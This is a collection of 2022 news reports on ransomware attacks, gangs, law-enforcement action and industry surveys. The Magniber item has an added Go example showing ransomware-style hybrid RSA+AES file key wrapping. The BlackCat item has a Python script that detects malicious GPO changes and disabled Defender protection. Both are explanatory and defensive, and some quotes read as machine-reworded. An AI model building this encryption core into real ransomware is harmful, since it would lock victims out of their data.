SWFD Alerts Patients About the Ransomware Attack


Santa Rosa Beach, Fla. (WMBB) – The South Walton Fire District (SWFD) is responding to a ransomware attack that took place in May 2022.

District officials say the threat actor targeted the district's computer systems over the Memorial Day weekend. The attack may have exposed patient information, specifically records of patients the fire district transported between 2007 and 2019.

While officials say there is so far no evidence that any information was leaked, a thorough investigation of the incident is ongoing, and the district is taking additional precautionary measures to secure the patient information that may have been exposed.

Details of The Ransomware Attack 

On Memorial Day, SWFD discovered that someone had gained temporary access to its dispatch system, encrypted its data, and left a ransom note.

“In essence, what somebody had done was get access to the system, encrypted the data, and left a ransom note for us to, basically, pay that ransom in order to get that data back […] Fortunately, internally we have a pretty robust mechanism in place to do backups. So we never had to engage that threat actor to gain that data back. We were able to re-install that data and be back up and running in about a day and a half,” says South Walton Fire District Fire Chief Ryan Crawford. 

Chief Crawford says the district took immediate action after learning of the attack, calling in federal, state, and local law enforcement, and that it continues to adopt new methods and technologies to protect its data against threat actors.

“We have already taken a number of additional layers of protection to try and mitigate the issue and prevent further instances like this from occurring,” says Crawford. 

Describing one of the cautionary measures, Crawford says, “One of the easiest ways is to take those archived medical records completely offline […] And so now, you know, those are really accessible to us for when people do public records requests and those sorts of things, it now requires us to go into the room where that server is located to pull that information rather than doing that remote.”

In addition to this, SWFD has also established a toll-free call center to solve queries regarding the incident and address related concerns. The call center agents can be reached at 1-800-939-4170 from 8 a.m. to 8 p.m. Central Time, Monday through Friday.  

International Summit Agrees to Crack Down on Digital Tokens to Counter Ransomware

 

In recent years, ransomware operators have consistently demanded payment in cryptocurrency.

Earlier this week, the White House's second International Counter Ransomware Initiative summit, which brought together 36 nations led by the US, agreed to strengthen ransomware countermeasures, specifically around the use of cryptocurrencies to finance ransomware operations.

The summit was far more explicit about digital tokens than its inaugural outing last year, as concern continues to grow over the ease with which attackers can obtain and move them. One of the primary issues identified by the Counter Ransomware Initiative (CRI) was the laundering of cryptocurrency.

To counter money laundering and terrorist financing, the CRI group said its crypto-related work will focus on sharing information about illicit crypto wallets across agencies worldwide, running workshops to improve blockchain tracing, and implementing identity verification for crypto transactions.

As a result of the summit, a number of nations agreed to the establishment of an International Counter Ransomware Task Force (ICRTF) that will initially be chaired by Australia and work "to coordinate resilience, disruption, and counter illicit finance activities." 

The Lithuanian Regional Cyber Defense Center (RCDC) will also begin playing host to a new "fusion cell" that will be utilized as a test case for a more extensive information-sharing program. 

Over the next year, the CRI will also draw up a roadmap for identifying priority targets and alerting law enforcement agencies, assemble a toolkit that other organizations can use to investigate ransomware attacks, and set up channels for sharing ransomware information between public and private bodies.

Ransomware is an increasingly popular means for cybercriminals to extort victims. According to data reported by banks to the U.S. Treasury Department, U.S. financial institutions observed approximately $1.2 billion in costs associated with ransomware attacks in 2021, nearly 200 percent more than in 2020.

“We may approach the challenge of ransomware with a different lens — and in some cases, an entirely different set of tools — but we are all here because we know that ransomware remains a critical threat to victims across the globe and continues to be profitable for bad actors,” Deputy Secretary of the Treasury Wally Adeyemo stated. 

“In fact, we know that hackers around the world consider conducting ransomware attacks the most profitable scheme on the internet. More profitable even than selling illegal drugs via dark net markets and stealing and selling stolen credit cards.”

Ransomware Attacks Continue Targeting U.S. Industrial Organizations

 

Industrial sectors have been hit hard by ransomware gangs in recent years, with manufacturing companies at the highest risk. U.S. organizations in particular have seen a large spike in attacks.
 
According to industrial cybersecurity firm Dragos, 25 of the 48 threat groups known to target industrial organizations and infrastructure were active in the third quarter of 2022. Several newer ransomware groups, including Sparta Blog, Bianlian, Donuts, Onyx, and Yanluowang, are on that list.
 
Dragos' Q3 analysis of ransomware attacks on industrial organizations found that North America accounted for 36% of all reported cases worldwide, with 46 incidents, up from 25% of cases in the previous quarter.
 
At a global level, however, the rate of attacks stayed flat quarter over quarter, with 128 incidents in Q3 versus 125 in Q2.
 
Most of the observed attacks, 68%, targeted the manufacturing sector. Of the confirmed attacks (those publicly reported, seen in the firm's telemetry, or confirmed on the dark web), 88 were against manufacturing, with makers of metal products hit hardest at 12 attacks.
 
As Stephen Banda, senior manager of security solutions at Lookout, points out, the manufacturing sector is digitizing at a swift pace: digitized manufacturing, inventory tracking, operations, and maintenance bring agility and efficiency, less production downtime, and greater nimbleness, but they also open up new attack surfaces for threat actors.
 
“To remain competitive, manufacturers are investing in intellectual property and new technologies like digital twins […] In short, manufacturers are transforming the way they produce and deliver goods – moving toward industrial automation and the flexible factory. This transformation, known as Industry 4.0, puts pressure on mobile devices and cloud solutions,” Banda told Dark Reading. Yet for most manufacturers, security solutions still remain on-premises, he adds.
 
“This creates efficacy and scalability challenges when tasked with protecting productivity solutions that have moved to the cloud[…]Security therefore must also move to the cloud to adequately safeguard manufacturing operations,” notes the Lookout senior manager.

Cybersecurity Teams At Their Saturation Point

As ransomware attacks rise in frequency and expose people and organizations to new dangers, cybersecurity professionals are nearing their breaking point. One-third of cybersecurity professionals are considering quitting their position in the next two years, according to a Mimecast poll of 1,100 workers worldwide.

According to the report, cybersecurity teams are under heavy pressure as a result of rising cybercrime rates and increased media coverage of cyberattacks. Many team members worry that a cyberattack will cost them their jobs, and others are struggling to keep up with the pressure.

Mimecast said that cybersecurity teams, tasked with keeping businesses secure, are operating in a pressure cooker of constant attacks, disruption, and burnout, which makes it even harder to recruit and retain the necessary specialists. According to Dreyer, "the need for cyber skills is greater than ever, and a lack of workers with the necessary competence has generated a constantly growing skills deficit only within industry."

Nearly two-thirds (64%) of cybersecurity leaders polled by Mimecast reported at least one ransomware attack in the previous year, and 77% said the frequency of cyberattacks on their company has increased or stayed the same since 2021.

Mimecast's research shows that these attacks take a personal toll on the health of cybersecurity professionals. More than half of respondents (54%) said ransomware attacks had a negative effect on their mental health, and 56% said their job gets more stressful every year.

Mimecast estimates that 56% of attacks cost the victim more than $100,000. Given that half of the decision-makers surveyed spend less than $550,000 a year on cybersecurity, a single attack can consume roughly 20% of the annual budget.
 
IT security managers also feel less personally accountable when an attack succeeds: 57% said a ransomware attack would make them feel highly responsible, down from 71% last year. Liability could be another obstacle to better cybersecurity awareness.



Indianapolis Housing Agency Seeks Experts' Help to Identify the Ransomware Attack Operators

 

After suffering a ransomware attack earlier this month, the Indianapolis Housing Agency (IHA) confirmed it has brought in outside experts to determine the source and operators of the attack.

The attackers targeted IHA's internal information and email systems. The private data of nearly 25,000 IHA residents, along with vendor and employee data and records of financial transactions shared with the Department of Housing and Urban Development, was put at risk.

“When we first learned about the breach, we contacted IHA and made sure they were ramping up and scaling up the technological expertise that they need to protect the data that may be subject to compromise,” Indianapolis Mayor Joe Hogsett stated. 

Although the source of this ransomware attack is still under investigation, attackers typically gain access by sending a deceptive email. “Phishing attack is when you get an email that looks like it came from a friend or someone trustworthy, but that sender address has been spoofed,” Apu Kapadia, professor of computer science at Indiana University’s Luddy School of Informatics, Computing, and Engineering, stated.

Because these attacks may originate abroad, identifying the offenders is challenging. Hogsett says he is working to prevent similar attacks from affecting other city agencies.

“In the interest of full disclosure, we made sure that the city of Indianapolis was firewalled, appropriately, so that our data would not be breached as the result of an intrusion,” Hogsett said. 

To ensure that landlords and vendors are paid on time, IHA officials are coordinating with the agency's bank and the US Department of Housing and Urban Development.

IHA has been making headlines for the wrong reasons over the past few years. The agency faced federal financial reviews after a whistleblower complained that it was operating at the whim of private investors who called their loans or moved to seize control of underperforming properties.

Marcia Lewis, IHA’s interim executive director, recently had her temporary one-year tenure extended, and Mayor Hogsett has delayed the search for a permanent replacement even as the agency sells off its interest in properties or contracts out on-site management.

According to IU Kelley School of Business professor Scott Shackelford, disclosing a breach involves a trade-off: it tips off the attackers that the agency and its clients know the data has been compromised, but the victims also need to be told to take precautions to protect their data.

“As soon as the hack happens, the clock does start ticking and unfortunately that means that folks’ information, their identities, could be compromised almost immediately. First, you can put a fraud alert on your credit report,” advised Shackelford. “This makes it much harder for criminals for example to open up new accounts in your name because there’s going to be a double checking that has to happen before they do that. You could also think about freezing your credit.”

Ferrari Refutes Ransomware Attack Following RansomEXX’s Online Claims

 

Italian carmaker Ferrari S.p.A. might have become the latest victim of a ransomware attack. According to a Reuters report, internal documents belonging to the brand were published on a dark web leak site run by the ransomware group RansomEXX.

However, the carmaker disputed such claims, stating that it has no evidence of a ransomware attack or of a breach of its systems. The company said it is investigating the leak of the internal documents and will take appropriate action as needed, adding that there has been no disruption to its business and operations.

On Monday, the newspaper Corriere della Sera, citing the Italian website Red Hot Cyber, reported that the luxury carmaker had been the victim of a ransomware attack.

According to Red Hot Cyber, the RansomEXX group claimed on its Tor leak site to have breached Ferrari and stolen 6.99 GB of data, including internal documents, datasheets, and repair manuals. The source of the documents remains unclear.

In December 2021, the ransomware gang Everest indirectly hit Ferrari when it attacked Italian manufacturing firm Speroni. At the time, the attackers siphoned 900 GB of data containing sensitive details about the firm’s partners, including Ferrari, Lamborghini, Fiat Group, and other Italian car manufacturers.

According to Cybernews, malicious actors also targeted Ferrari’s entry into the NFT market earlier this year, hijacking a company subdomain and using it to host an NFT scam almost immediately after Ferrari announced it would mint tokens based on its cars.

RansomEXX has been operating since 2018 and adopted its current name in June 2020. The gang's tooling has grown more capable, and it targets high-profile firms.

High-profile organizations targeted by RansomEXX in the past include the Texas Department of Transportation (TxDOT), Konica Minolta, Brazilian government networks, IPG Photonics, and Tyler Technologies. RansomEXX also maintains a Linux variant of its encryptor so that it can reach critical servers and data that are not running Windows.

Maastricht University Retrieves Ransom Amount Paid in 2019

 

Earlier this month, Maastricht University (UM) in the southern Netherlands, which has more than 22,000 students, revealed that it had recovered the ransom it paid after a ransomware attack on its network in December 2019.

After a detailed investigation of the incident, Fox-IT researchers attributed the attack to a financially motivated cybercrime group tracked as TA505 (also known as SectorJ04). The group has been active since at least 2014 and has primarily targeted retail and financial organizations.

The attackers breached the university's systems through phishing emails in mid-October 2019 and, after moving laterally through the network, deployed Clop ransomware on 267 Windows systems on December 23.

A week later, the university decided to give in to the gang's demand and paid a 30 bitcoin ransom (roughly €200,000 at the time) for the decryptor. This was partly because personal data was at risk of being lost and students were unable to sit exams or work on their theses, and partly because rebuilding all compromised systems from scratch or building its own decryptor were not viable options.

"It is a decision that was not taken lightly by the Executive Board. But it was also a decision that had to be made," University explained in a blog post. "We felt, in consultation with our management and our supervisory bodies, that we could not make any other responsible choice when considering the interests of our students and staff."

However, as UM recently revealed, Dutch police traced and seized a wallet containing part of the cryptocurrency the university paid as ransom in 2019.

"The investigation [..] eventually paved the way for the seizure of the cryptocurrency by the Dutch Public Prosecution Service. As early as February 2020, the investigation team froze a so-called wallet containing part of the paid ransom," UM said. "The value of the cryptocurrencies found at that time was €40,000; at the current exchange rate, they are worth approximately €500,000."

Although this might look like the university turned a considerable profit in a relatively short time, the €500,000 seized by the Netherlands' Public Prosecution Service is significantly less than the damage the attack caused. The seized funds are now in a bank account under the control of law enforcement, and the Ministry of Justice has initiated legal proceedings to transfer them to the university.

North Orange County Community College District Suffered Ransomware Attack

 

According to an official filing by the District, on Monday, January 10, 2022, the North Orange County Community College District (NOCCCD or the District) noticed malicious activity on servers at both of the District’s colleges, Cypress College and Fullerton College.

In response, the District launched an investigation with the assistance of outside computer forensic specialists to learn more about the attack and determine whether any employee or student data was breached. The notices posted on the two campuses' websites confirmed that this was a ransomware incident.

On March 25, 2022, NOCCCD reportedly notified more than 19,000 people of a data security incident and began sending data breach notification letters to all employees and students whose information was affected. The District added that it will send additional notification letters if it finds that other parties were impacted.

The investigation confirmed that files containing sensitive personal data of employees and students may have been accessed or removed from the District’s network. A copy of the notice was also posted on the Fullerton College international students site.

Describing what types of data might have been compromised, the notice read, “name, and passport number or other unique identification number issued on a government document (such as Social Security number or driver’s license number); financial account information; and/or medical information.”

The District says it is also working with the colleges to review and strengthen existing data protection policies. It has implemented multi-factor authentication and an advanced threat protection and monitoring tool to better secure its systems and data, and is rolling out new cybersecurity training for employees across the District.

New Variant of Magniber Ransomware is Targeting Windows 11 Users

 

Security analysts at 360 Security Center have discovered a new strain of Magniber ransomware targeting Windows 11 systems. Since May 25, Magniber's attack volume has surged significantly, and the names of its primary delivery packages have changed, for example to win10-11_system_upgrade_software.msi and covid.warning.readme.xxxxxxxx.msi.

The ransomware is distributed through various online platforms, cracked-software sites, fake pornographic sites, and the like. When users visit these fake sites, they are lured into downloading the package from third-party file-hosting services.

According to the researchers, the ransomware itself has not changed much and can run on multiple Windows versions. It uses the RSA+AES hybrid scheme common to modern ransomware: file contents are encrypted with AES, and the AES key is in turn encrypted with the attacker's RSA public key, which here is 2048 bits long and currently infeasible to break.
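To show why that key wrapping leaves nothing recoverable on the victim machine, here is an added example in Go written for this page; it is not Magniber's code, and the file layout, field names, and the functions Lock, Unlock and RoundTrip are this example's own assumptions. Each file gets a fresh AES-256-GCM key, which is wrapped with RSA-OAEP under a 2048-bit public key, so only the holder of the matching private key can unwrap it.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// LockedFile is what a hybrid RSA+AES locker leaves behind for one file: the
// AES-GCM ciphertext plus the per-file AES key wrapped (RSA-OAEP) under the
// operator's public key. The layout is this example's assumption, not the
// on-disk format of any real ransomware.
type LockedFile struct {
	WrappedKey []byte
	Nonce      []byte
	Ciphertext []byte
}

// Lock encrypts one file's contents. Only the RSA public key is needed here,
// which is why nothing on the victim machine can reverse the operation.
func Lock(pub *rsa.PublicKey, plaintext []byte) (*LockedFile, error) {
	key := make([]byte, 32) // fresh AES-256 key for this file only
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := aead.Seal(nil, nonce, plaintext, nil)
	// Wrap the per-file key under the operator's 2048-bit RSA public key.
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return nil, err
	}
	return &LockedFile{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ct}, nil
}

// Unlock is what the decryptor the victim is asked to pay for has to do: it
// needs the RSA private key to unwrap the per-file AES key.
func Unlock(priv *rsa.PrivateKey, lf *LockedFile) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), nil, priv, lf.WrappedKey, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap per-file key: %w", err)
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return aead.Open(nil, lf.Nonce, lf.Ciphertext, nil)
}

// RoundTrip is a self-check: lock under the operator's public key, show that an
// unrelated private key cannot unlock, then unlock with the operator's key.
func RoundTrip(plaintext []byte) (recovered bool, wrongKeyFails bool, err error) {
	operator, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return false, false, err
	}
	other, err := rsa.GenerateKey(rand.Reader, 2048) // stands in for any key the victim might guess
	if err != nil {
		return false, false, err
	}
	lf, err := Lock(&operator.PublicKey, plaintext)
	if err != nil {
		return false, false, err
	}
	_, wrongErr := Unlock(other, lf)
	pt, err := Unlock(operator, lf)
	if err != nil {
		return false, wrongErr != nil, err
	}
	return bytes.Equal(pt, plaintext), wrongErr != nil, nil
}

func main() {
	// Constructed sample input; not real victim data.
	ok, wrongFails, err := RoundTrip([]byte("constructed sample document contents"))
	fmt.Println("recovered with operator key:", ok, "| unrelated key fails:", wrongFails, "| err:", err)
}
```

RoundTrip deliberately tries an unrelated key pair first: the unwrap fails, and that, rather than any weakness in AES, is why researchers can say no decryptor exists short of obtaining the operator's private key. Backups, not cryptanalysis, are the recovery path.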

Encrypted files receive a random extension, and each victim gets a separate payment page. If the ransom is not paid within the specified time, the link becomes invalid. A victim who pays within 5 days pays 0.09 bitcoin; after 5 days the ransom doubles.

This is the second time in two months that the attackers have targeted Windows users. In April, they used fake Windows 10 updates to spread Magniber, distributing them under names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via pirated-software sites, posing as legitimate cumulative or security updates.

That campaign started on April 8, 2022, and has seen wide distribution since. It remains unclear exactly how the fake Windows 10 updates are being promoted through the fake warez and crack sites.

According to security researchers, no safe decryptor exists for this ransomware, and no weakness in the malware that would allow an infection to be reversed is known as of yet. The ransomware currently targets home users and students rather than corporate customers, so users should remain vigilant, avoid downloading cracked software, and use only legitimate sites.

Magniber was first spotted in 2017 targeting victims in South Korea. In 2021 it used the PrintNightmare exploit to target Windows users, and in January of this year it was distributed through fake Microsoft Edge and Chrome updates.

Ransomware Attack Disrupts SpiceJet Flight Operations

 

An attempted ransomware attack halted the operations of budget carrier SpiceJet on Tuesday night, leaving passengers stranded for hours at airports across India on Wednesday morning.

The controversy started after a SpiceJet passenger, Mudit Shejwar, flagged the delay of his flight to Dharamshala, which had still not taken off 80 minutes after boarding was completed.

“On board flight SG2345 to Dharmshala, it's been already 80 mins since we boarded the plane, we have not taken off yet, the only communication is of some server down and issue with paper work for fuel, is this for real,” Mudit tweeted, tagging Spicejet, Civil Aviation Minister Jyotiraditya Scindia, Airport Authority of India and the Delhi airport authority. 

“Certain SpiceJet systems faced an attempted ransomware attack last night that impacted and slowed down morning flight departures today. Our IT team has contained and rectified the situation, and flights are operating normally now,” the airline tweeted. 

However, the reply did not sit well with the passenger, who said passengers had been stuck on the aircraft for close to four hours without food. “Operating normally?? We are stuck here since 3 hrs and 45 mins? Neither cancelling nor operating, sitting in the flight not even the airport. No breakfast, no response,” Shejwar replied.

The airline did not disclose whether it had paid the attackers. Industry sources said the attack resembled the one on Indigo in December 2020. Then, too, the airline confirmed the attack and said some segments of its data servers had been breached, but little is known about the outcome of that investigation or whether any payment was made.

Last year, 78 percent of Indian organizations surveyed were hit by ransomware, up from 68 percent in 2020. The average ransom paid by Indian organizations to get their data decrypted was $1.2 million, according to a report by British cybersecurity firm Sophos released earlier this month.

According to the Directorate General of Civil Aviation, SpiceJet is the second-largest airline in India, operating a fleet of more than 90 aircraft, with a market share of 13.6% as of March 2019. 

In 2021, SpiceJet went through severe financial trouble as a result of grounding its fleet under COVID-19 restrictions. The struggling airline’s accumulated losses neared ₹5,478 crore, while its liabilities exceeded its assets by ₹6,347 crore over the same period.

Multiple Organizations Targeted by Conti Ransomware Worldwide

 

The Conti ransomware gang continues to wreak havoc around the globe. Its latest victim is Peru's Dirección General de Inteligencia (DIGIMIN), the country's premier intelligence agency.

The group claims to have stolen 9.41 GB of data from the agency, which is responsible for national, military, and police intelligence as well as counterintelligence. An attack on an intelligence agency could lead to the disclosure of secret and confidential documents and pose a threat to national security.

Last week, the US Department of State offered a reward of up to $15 million for information on the group. The reward includes $10 million for the identification or location of the leaders of the Conti ransomware gang.

Additionally, $5 million is offered for information that results in the arrest and/or conviction of any individual in any country conspiring to participate in, or attempting to participate in, a Conti variant ransomware incident. The reward is offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP).

"The Conti ransomware group has been responsible for hundreds of ransomware incidents over the past two years," the statement read. "The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti ransomware variant the costliest strain of ransomware ever documented." 

Costa Rica's President Rodrigo Chaves declared a national cybersecurity emergency over the weekend, following a financially motivated Conti ransomware attack on his administration that has paralyzed the country's government and economy. Shortly after the incident in April, then-President Carlos Alvarado publicly declined to pay a $10 million ransom demand, and Conti has since published nearly all of the 672 GB of data stolen from the government.

After targeting the Costa Rican government, the group posted a message on its leak site calling the attack merely a “demo version.” The group said the attack was motivated solely by financial gain but also expressed general political disgust, another signal that more government-directed attacks may follow.

The Conti group's attacks are serious enough to have forced a nation to declare a national emergency. Security experts therefore recommend that organizations invest in robust preventive measures, including anti-ransomware tooling, frequent data backups, network firewalls, and email gateways.

Russian Group Attack on Bulgarian Refugee Agency

 

A ransomware group with strong ties to Russia warned on Wednesday that it will publicly post files it stole from the Bulgarian government agency responsible for refugee management.

LockBit 2.0 published a notice on its dark web site saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers. “All available data will be published!” the notice read, beneath the group’s trademark bright red countdown clock, which showed a May 9 publication date. Notably, the post did not specify a ransom demand.

According to the Sofia Globe, a news organization in the Bulgarian capital, nearly 5.7 million Ukrainian refugees have fled their country since February; approximately 230,000 of them came to Bulgaria, and 100,700 remain in the country.

The official website of the agency remains active, however, a notice on the site’s home page reads, “due to network problems, the e-addresses of the State Agency for Refugees at the Council of Ministers are temporarily unavailable.”

Reporters contacted the agency for comment, but it did not immediately respond to the email. A spokesperson at the Bulgarian embassy in Washington, D.C., later said he had no information on the incident and would look into the matter.

LockBit 2.0 is an updated version of LockBit, a ransomware strain first spotted in September 2019, according to cybersecurity firm Emsisoft. Originally known as ABCD ransomware after the file extension it appended to encrypted files, the malware took its current name when that extension changed to “LockBit”. In September, the group also made headlines for launching its own leak website.

“This is simply the latest in a very long list of hits on organizations which provide critical services...,” said Brett Callow, a threat analyst at Emsisoft. 

“...Hospitals, [search and rescue], fire departments, and charities for the disabled have all been targeted. The individuals involved with ransomware are conscienceless scumbags and the sooner we find a way to deal with the problem, the better.”

Kellogg Community College Closes after Ransomware Attack

 

Kellogg Community College in Michigan has closed its campuses and canceled classes after falling victim to a cyber-attack. The Battle Creek-based community college serves approximately 7,000 students annually.

On Sunday, the college posted a statement on its website with basic information about the ransomware attack, which took place over the weekend, and announced the cancellation of all Monday classes and the closure of its five campuses in Battle Creek, Coldwater, Albion, and Hastings.

The statement noted that the attack was still causing technology problems: “the technology issues we have been experiencing were caused by a ransomware attack that continues to affect our systems.”

All five Kellogg campuses will remain closed while the security issues are investigated, although the college hopes to reopen later this week. It is also preparing a “forced password reset for all students, faculty, and staff” to better secure the network.

“We want to reassure our faculty and students that we will take any actions necessary for students to complete course work in a timely manner and appreciate your patience and support in the meantime,” the alert read. 

Since 2021, a number of community colleges have fallen victim to ransomware, including Butler County Community College in Pennsylvania, Sierra College in California, and Lewis and Clark Community College in Illinois.

“As we have previously informed you, we have been the victim of a ransomware attack on our systems and services. We are still working to understand the full extent of this incident, but since our last update, we have been working diligently with our IRT team and have made progress in our restoration process,” said Kellogg Community College.

FBI Issues Warning as BlackCat Ransomware Targets More Than 60 Organizations Worldwide

An FBI flash alert released this week suggests that the law enforcement agency has identified at least 60 ransomware attacks worldwide by the BlackCat (ALPHV) group between November 2021 and March 2022. 

The flash alert highlights the tactics, techniques, and procedures (TTPs) employed and indicators of compromise (IOCs) associated with ransomware groups spotted during FBI investigations.

According to the FBI's Cyber Division, BlackCat, also tracked as ALPHV and Noberus, "is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing."

BlackCat's ransomware executable is also highly customizable and is loaded with several encryption methods and options that make it easy to adapt attacks to a wide range of industrial organizations. "Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations," the FBI added. 

Security researchers recently revealed an increased interest from BlackCat operators in targeting industrial organizations. BlackCat affiliates often demand ransom payments of millions of dollars, but they have been observed accepting lower payments after negotiations with their victims. 

For initial access, the FBI explains, BlackCat employs compromised user credentials. Next, Active Directory user and administrator accounts are compromised and malicious Group Policy Objects (GPOs) are used to deploy the ransomware, but not before victim data is exfiltrated. 

As part of observed BlackCat assaults, PowerShell scripts, Cobalt Strike Beacon, and authentic Windows tools and Sysinternals utilities have been used. The malicious actors were also seen disabling security features to move unhindered within the victim’s network. 
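The chain described above (compromised credentials, then Active Directory accounts, then a malicious GPO that pushes the ransomware while security features are switched off) leaves a recognisable trace in Windows event logs. The script below is an added defender-side example, not FBI or page code: it correlates GPO create/modify events (Security event IDs 5136/5137 on groupPolicyContainer objects) with Microsoft Defender "real-time protection disabled" events (ID 5001) over a constructed, simplified set of records. The record field names, the list of approved GPO editors and the 30-minute correlation window are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Windows event IDs used here (real IDs; the records below are constructed):
#   5136 / 5137 - directory service object modified / created (Security log;
#                 object class groupPolicyContainer means a GPO was edited)
#   5001        - Microsoft Defender real-time protection disabled
GPO_EVENT_IDS = {5136, 5137}
DEFENDER_RTP_DISABLED = 5001
GPO_CLASS = "groupPolicyContainer"

# Accounts expected to edit Group Policy. Assumption for the example; in
# practice this list comes from the organisation's change records.
APPROVED_GPO_EDITORS = {"gpo_admin"}

# Constructed sample records, not real telemetry. Only the fields this
# script needs are kept, named after the fields of the real events.
SAMPLE_EVENTS = [
    # Routine, approved GPO edit two days earlier; nothing follows it.
    {"time": "2022-02-27T09:00:00", "event_id": 5136, "host": "dc01",
     "user": "gpo_admin", "object_class": GPO_CLASS,
     "object_dn": "CN={GPO-GUID-PLACEHOLDER-1},CN=Policies,CN=System,DC=corp,DC=example"},
    # A service account creates a brand-new GPO at 01:05 ...
    {"time": "2022-03-01T01:05:30", "event_id": 5137, "host": "dc01",
     "user": "svc_backup", "object_class": GPO_CLASS,
     "object_dn": "CN={GPO-GUID-PLACEHOLDER-2},CN=Policies,CN=System,DC=corp,DC=example"},
    # ... and minutes later real-time protection goes off on workstations.
    {"time": "2022-03-01T01:07:10", "event_id": 5001, "host": "ws-042", "user": "SYSTEM"},
    {"time": "2022-03-01T01:07:12", "event_id": 5001, "host": "ws-043", "user": "SYSTEM"},
    # A user object change by the same account: not a GPO, so ignored.
    {"time": "2022-03-01T01:06:00", "event_id": 5136, "host": "dc01",
     "user": "svc_backup", "object_class": "user",
     "object_dn": "CN=jdoe,CN=Users,DC=corp,DC=example"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def gpo_changes(events):
    """GPO create/modify events, oldest first."""
    return sorted((e for e in events
                   if e["event_id"] in GPO_EVENT_IDS
                   and e.get("object_class") == GPO_CLASS), key=_ts)


def protection_disabled_after(events, start, window):
    """Hosts whose Defender real-time protection was disabled in [start, start+window]."""
    return {e["host"] for e in events
            if e["event_id"] == DEFENDER_RTP_DISABLED
            and start <= _ts(e) <= start + window}


def detect_gpo_staging(events, window=timedelta(minutes=30), min_hosts=2):
    """One alert per suspicious GPO change: made by a non-approved account,
    or followed by protection being disabled on at least `min_hosts` endpoints."""
    alerts = []
    for gpo in gpo_changes(events):
        hosts = protection_disabled_after(events, _ts(gpo), window)
        reasons = []
        if gpo["user"] not in APPROVED_GPO_EDITORS:
            reasons.append(f"GPO changed by non-approved account {gpo['user']}")
        if len(hosts) >= min_hosts:
            reasons.append(f"real-time protection disabled on {len(hosts)} hosts within {window}")
        if reasons:
            alerts.append({"time": gpo["time"], "user": gpo["user"],
                           "object": gpo["object_dn"], "hosts": sorted(hosts),
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_gpo_staging(SAMPLE_EVENTS):
        print(alert["time"], alert["user"], alert["object"])
        for reason in alert["reasons"]:
            print("  -", reason)
```

Run against the constructed records, the approved edit on 27 February produces nothing, while the 1 March GPO creation is flagged twice over: the editing account is not on the approved list, and two endpoints lost real-time protection within the window. Either condition alone is worth a ticket; both together are the staging pattern the FBI notice describes.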

As usual, the FBI recommends not paying the ransom, as this would not guarantee the recovery of compromised data, and urges organizations to proactively deploy cybersecurity defenses that can help them prevent ransomware attacks. 

Since the start of the year, the notorious group has taken credit for ransomware attacks on US schools like Florida International University and North Carolina A&T University and has already breached dozens of US critical infrastructure organizations. 

The group was first spotted in November 2021 and became known for aggressively posting details about its victims publicly. Emsisoft threat analyst Brett Callow and others previously said the group is a rebrand of the BlackMatter and DarkSide ransomware groups, something the FBI also highlighted in its notice.

Karakurt Hacking Group Linked to Conti and Diavol Ransomware Crew

Cybersecurity researchers from Arctic Wolf Networks published a blog post on Friday claiming that the cyber extortion group Karakurt is operationally associated with both the Conti and Diavol ransomware groups, operating as an exfiltration arm of the ransomware organizations. 

In the blog post, the researchers said that since its first attacks in August 2021, the Karakurt hacking group has targeted more than 40 organizations across a number of industries in at least eight nations.

In conducting the in-depth research, Tetra Defense, an Arctic Wolf company, collaborated with Chainalysis and Northwave to examine the cryptocurrency wallets tied to the Karakurt hacker group, together with its specific technique for data theft. The analysis confirmed that the group's membership overlaps with the Conti and Diavol ransomware crews. 

Tetra's report describes the experience of a client firm that was targeted by the Conti group and subsequently hit again by a data theft carried out by the Karakurt hacking group. The analysis confirmed that the Karakurt attack used the same backdoor to access the client's systems as the earlier Conti assault. These associations debunk the Conti group’s assurance to victims that paying the ransom will shield them from future attacks.

"Such access could only be obtained through some sort of purchase, relationship, or surreptitiously gaining access to Conti group infrastructure," Tetra explained in its report. 

It is essential to distinguish between the types of cyber attack described here, according to Tetra. In a ransomware attack, critical information is encrypted and a ransom is paid in exchange for a decryption key so that the victim can recover its data and resume operating. In a data theft, which has been the only type of attack carried out by the Karakurt group, threat actors steal sensitive corporate data and demand money in exchange for not releasing it. 

The Karakurt attacks of this type — there have been more than a dozen to date, according to Tetra — also employed cryptocurrency wallets associated with Conti victim payment addresses, further strengthening the argument that the two groups' membership may overlap significantly. 

“Traditionally, we have seen the criminals honor their offers,” Nathan Little, senior vice chairman of digital forensics and incident response at Tetra stated. “Early on, when these [data theft attacks] began in 2019, it was widespread that corporations had been frightened sufficient that they’d pay, to not cover the incident, however to keep away from the results.”

In 2021, Ransomware Threats were Self-Installed

According to Expel, a managed detection and response (MDR) company, the majority of ransomware assaults in 2021 were self-installed. The revelation was made in the annual report on cybersecurity trends and predictions, 'Great eXpeltations'. 

Eight out of ten ransomware outbreaks were caused by victims unintentionally opening a zipped file containing malicious code. A further 3% of all ransomware cases stemmed from abuse of third-party access, and some 4% were caused by exploitation of a software weakness on the perimeter. 

